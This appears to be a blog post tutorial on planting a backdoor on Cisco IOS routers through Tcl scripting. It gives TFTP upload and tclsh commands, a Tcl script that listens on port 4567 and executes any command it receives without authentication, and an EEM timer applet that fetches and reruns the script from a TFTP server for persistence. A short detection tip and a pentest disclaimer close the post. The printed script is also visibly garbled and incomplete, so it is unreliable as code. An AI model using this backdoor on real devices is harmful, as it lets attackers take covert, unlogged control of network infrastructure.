Attacking Cisco Router over TCL


Today only lazy or out from the IT sphere person never heard about Cisco. Company specialized in developing network devices and solving all related problems. IOS (Internetwork Operation System) is installed on Cisco networking equipment and allows flexible system configuration. There is different method for attacking Cisco devices but what we will be looking at is attacking Cisco devices using TCL.

Tcl (Tool Command Language) is a scripting language used on embedded systems platforms, both in its full form and in several other small-footprinted versions. From Cisco IOS version 12.3 (7/28/2003), TCL has been included in Cisco IOS as a generic scripting language.

When you first log to Cisco router you are in user EXEC mode (level 1) from this mode you can have just some information such as interfaces status, view routes in the routing table. Now for TCL we need privilege level 15 (full admin) rights to execute a script, this level is equivalent to having root privileges in UNIX or administrator privileges in Windows.

For uploading the TCL script to cisco device we can use different protocols such as TFTP, RCP or SCP. For TFTP you do the following:

Router# copy tftp://tftpserver/script.tcl flash://script.tcl
Router# tclsh flash://script.tcl

Now the tcl script has been published by Andy Davis from the Information Risk Management and after some modefication it will looks as follows:

[php]proc callback {sock addr port} {
fconfigure $sock -translation lf -buffering line
puts $sock " Enter your desired IOS command:"
puts $sock " "
puts -nonewline $sock “Router# ”
puts $sock $response
fileevent $sock readable [list echo $sock]
proc echo {sock} {
global var
if {[eof $sock] || [catch {gets $sock line}]} {
} else {
set response [exec "$line"]
puts $sock $response
set port 4567
set sh [socket -server callback $port]
vwait var
close $sh_[/php]

Here we will have a backdoor on the router, so if an attacker will run telnet on port 4567 he will have the following:

$ telnet router 4567
Trying router…
Connected to router.
Escape character is ‘^]’.

Enter your desired IOS command:


This vulnerability has been fixed in recent IOS versions, but you can still use the same technique if you convert the Tclsh script into an EEM policy and trigger it periodically with a timer event as follows:

Router # Conf t
Router (config) # event manager applet Tclsh
Router (config-applet) # event timer countdown name Delay time 20
Router (config-applet) # action 1 cli command “enable”
Router (config-applet) # action 2 cli Tclsh tftp://tftpserver/script.tcl

By executing the backdoor a penetration tester can access to the targeted host, bypassing all security measures such as authentication or access logging. For detecting that your router is compromised you need to run:

Router # show tcp brief all

Which is equivalent to Netstat on windows or linux system and it will list all connection established or waiting to be established on the router. So for the security of your business make sure to have the latest IOS version, to update all your systems and to use best practices for implementing or configuring any device.

Warning: The technique demonstrated is intended just for the use during an authorized penetration testing mission.


Cisco IOS Scripting with Tcl

SANS Institute IOScat – a Port of Netcat’s TCP functions to Cisco IOS

make sure you subscribe to my RSS feed!